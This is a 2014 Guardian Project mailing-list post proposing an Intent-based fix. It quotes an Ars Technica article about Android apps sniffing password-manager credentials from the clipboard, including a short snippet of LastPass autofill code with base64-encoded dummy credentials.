[guardian-dev] Proof-of-concept exploit against LastPass could easily be extended to other apps.

Hans-Christoph Steiner hans at guardianproject.info
Mon Nov 24 06:24:46 EST 2014

(moving this to guardian-dev)

This would be a very nice application of our TrustedIntents library.  We could
define an Intent method for handing a password, then add TrustedIntents to
KeePassDroid and then our apps, especially Orweb and Orfox.  I think that
would serve as a good example as a way to fix this issue without having to
change Android itself at all.


noel hidalgo | gProject:
> http://arstechnica.com/security/2014/11/using-a-password-manager-on-android-it-may-be-wide-open-to-sniffing-attacks/
> page1image776
> Using a password manager on Android? It may be wide open
> page1image2328
> to sniffing attacks
> Proof-of-concept exploit against LastPass could easily be extended to other apps.
> by Dan Goodin - Nov 21, 2014 6:55 pm UTC
> page1image4680 page1image4840 page1image5000 page1image5160 page1image5320
> Aurich Lawson
> page1image5976
> In early 2013, researchers exposed some unsettling risks stemming from 
> Android-based password managers. In a paper titled "Hey, You, Get Off of My 
> Clipboard," they documented how passwords managed by 21 of the most popular such 
> apps could be accessed by any other app on an Android device, even those with 
> extremely low- level privileges. They suggested several measures to help fix the 
> problem.
> Almost two years later, the threat remains viable in at least some, if not all, 
> of the apps originally analyzed. An app recently made available on Google Play, 
> for instance, has no trouble divining the passwords managed by LastPass, one of 
> the leading managers on the market, as well as the lesser-known KeePassDroid. 
> With additional work, it's likely that the proof-of-concept ClipCaster app would 
> work seamlessly against many other managers, too, said Xiao Bao Clark, the 
> Australia-based programmer who developed it. While ClipCaster does nothing 
> more than display the plaintext of passwords that LastPass and KeePassDroid 
> funnel through Android handsets, a malicious app with only network privileges 
> could send the credentials to an attacker without the user having any idea what 
> was happening.
> "Besides the insecurity of it, what annoyed me was that I was never told any of 
> this while I was signing up or setting up the LastPass app," Clark wrote in an 
> e-mail. "Instead, I got the strong impression from LastPass that everything was 
> very secure, and I needn't worry about any of it. If they at least told users 
> the security issues using these features brings, then the users themselves could 
> decide on their own trade-off between usability and security. Not mentioning it 
> at all strikes me as disingenuous."
> Asked if LastPass has ever notified users of the risk, company CEO Joe Siegrist 
> didn't give a yes or no answer. Instead, he responded, "This is an any clipboard 
> activity problem [his emphasis] and impacts any password manager involving the 
> clipboard (100% of them)—the way all password managers have consistently allowed 
> you to enter your password into other apps since Android has existed. This 
> demonstration is aimed at LastPass, but it's the whole of Android that must be 
> addressed."
> Clark agreed that any Android-based password manager that uses the OS clipboard 
> is susceptible. He strongly recommends that people stop using any app setup that 
> works this way. Many apps use standalone browsers, browser extensions, or 
> software keyboards to enter credentials into login fields. There is no evidence 
> they are susceptible to sniffing. The reason ClipCaster takes special aim at 
> LastPass, Clark said, is simple. It just happened to be the manager he installed 
> on his phone. There are no reports that password managers running
> on iOS or Windows Phone are vulnerable. But there can be way to know for sure, 
> since Ars is unaware of the any comprehensive study testing the security of 
> managers on those platforms.
> As already alluded, the threat stems from the use of the Android clipboard, 
> which acts as a temporary cache for text that is being copied and pasted, either 
> within the same app or from one app to another. Android has no official 
> programming interface that secures the clipboard. By design, its contents are 
> available to any app installed on the phone, from the highest privileged banking 
> app to one with no privileges at all. (ClipCaster, for instance, requires no 
> permissions.) Siegrist rightly noted that any password manager that makes use of 
> the Android clipboard—and there are plenty, including LastPass—is vulnerable.
> LastPass has several different methods for plucking passwords out of their 
> highly fortified vault and plugging them into the password field of a browser or 
> app. Not all of the options are susceptible to sniffing, but notably, the one 
> LastPass recommends that Android users choose leaves them wide open. The option 
> is known as autofill, a feature that seamlessly plugs passwords into apps and 
> the Chrome browser.
> Shortly after installing LastPass, Clark came across the 2013 paper that 
> discussed the clipboard vulnerability. It got him wondering about the 
> security of his decision, so he began analyzing the JavaScript autofill uses 
> to populate username and password fields in Chrome. In about an hour, he had 
> a crude but working exploit that monitored the Android clipboard and captured 
> login credentials transported by autofill. His proof-of-concept app works by 
> listening to the notices the clipboard broadcasts to installed apps and looking 
> for a familiar patterns in the code.
> Clark concocted a dummy account containing the username "j.doe at actisec.com" and 
> the password "s4f3p4assw0rd," and observed the way the credentials were funneled 
> through the clipboard. Autofill wrote a blob of code to the clipboard and then 
> pasted it into the address bar of Chrome. The code contained the following 
> telltale lines:
> if (l_bte) { ;
> l_sfv(l_bte, decodeURIComponent(escape(atob('ai5kb2VAYWN0aXNlYy5jb20='))))
> }
> l_sfv(l_bpe, decodeURIComponent(escape(atob('czRmZXBhc3N3MHJk'))));
> An image of ClipCaster sniffing the password "s4f3p4assw0rd" as a user logs in 
> to Facebook.
> Xiao Bao Clark
> "atob" is a JavaScript function for decoding strings that have been 
> converted into base64-encoded representations. Presumably, LastPass 
> developers chose the encoding to make it less obvious to other apps what the 
> clipboard contents are. But to anyone with a modest amount of training, 
> the measure is little more than an exercise in the largely discredited 
> protection known as "security through obscurity." ClipCaster monitors the 
> clipboard for the patterns, decodes the base64 strings and, as illustrated in 
> the image to the right, displays them.
> In e-mails sent to Ars, Siegrist, the LastPass CEO, rightly noted that 
> the vulnerability isn't unique to his company's product, or even to Android devices.
> "This is an OS-level issue that impacts everything running on Android," he said. 
> "If you use the clipboard to copy any data, a malicious app could obtain it—like 
> installing a clipboard monitoring software on Windows or a keylogger on Windows. 
> You can compromise your security by installing bad software."
> Siegrist also noted that attacks like the one carried out by ClipCaster work
> only when LastPass or another password manager runs on an Android device
> that has a malicious app installed, and then only when the manager uses the 
> device's clipboard. The CEO said that LastPass users should run only "trusted" 
> apps, meaning those distributed over Google Play by a trusted company and widely 
> used and reviewed.
> Still, his statements omit some important distinctions. First, LastPass on 
> Windows doesn't use the clipboard to pass login credentials to Chrome, 
> and presumably other browsers, Clark's research found. And second, most Windows 
> users—and a growing number of Mac users as well—use antivirus protection to 
> detect such threats. Android antivirus apps exist, but there's little evidence 
> that most users install one. Third, his advice about installing only trusted 
> apps is sound, but given the regular occurrence of malicious apps that slip 
> through Google defenses and are hosted in the company's official Play Store, 
> it's unrealistic to expect end users to always spot rogue titles.
> page2image36576 page2image36744
> rogue titles.
> One of the key defenses of Android is its application sandbox, which prevents 
> one app from accessing sensitive data belonging to another app, presumably under 
> the premise that not all apps will be trustworthy. When an app as sensitive as a 
> password manager doesn't enjoy a protection as crucial as this, the companies 
> should make this limitation explicit. LastPass and the developers of other 
> vulnerable managers should be
> forthright about the risks and tell users what they can do to protect 
> themselves. In the case of LastPass, the threat can be eliminated simply by 
> opting out of the recommended autofill option and instead using the LastPass 
> browser or LastPass keyboard. Many users may decide the convenience of autofill 
> is worth the added risk, but at least they will be making an informed choice.
> Dan Goodin / Dan is the Security Editor at Ars Technica, which he joined in 2012 
> after working for The Register, the Associated Press, Bloomberg News, and other 
> publications.
> @dangoodin001
> page3image9728
> © 2014 Condé Nast. All rights reserved
> Use of this Site constitutes acceptance of our User Agreement (effective 
> 3/21/12) and Privacy Policy (effective 3/21/12)
> Your California Privacy Rights
> The material on this site may not be reproduced, distributed, transmitted, 
> cached or otherwise used, except with the prior written permission of Condé Nast.
> _______________________________________________
> Guardian-internal mailing list
> Post: Guardian-internal at lists.mayfirst.org
> List info: https://lists.mayfirst.org/mailman/listinfo/guardian-internal
> To Unsubscribe
>         Send email to:  Guardian-internal-unsubscribe at lists.mayfirst.org
>         Or visit: %(user_optionsurl)s
> You are subscribed as: %(user_address)s

PGP fingerprint: 5E61 C878 0F86 295C E17D  8677 9F0F E587 374B BE81

More information about the Guardian-dev mailing list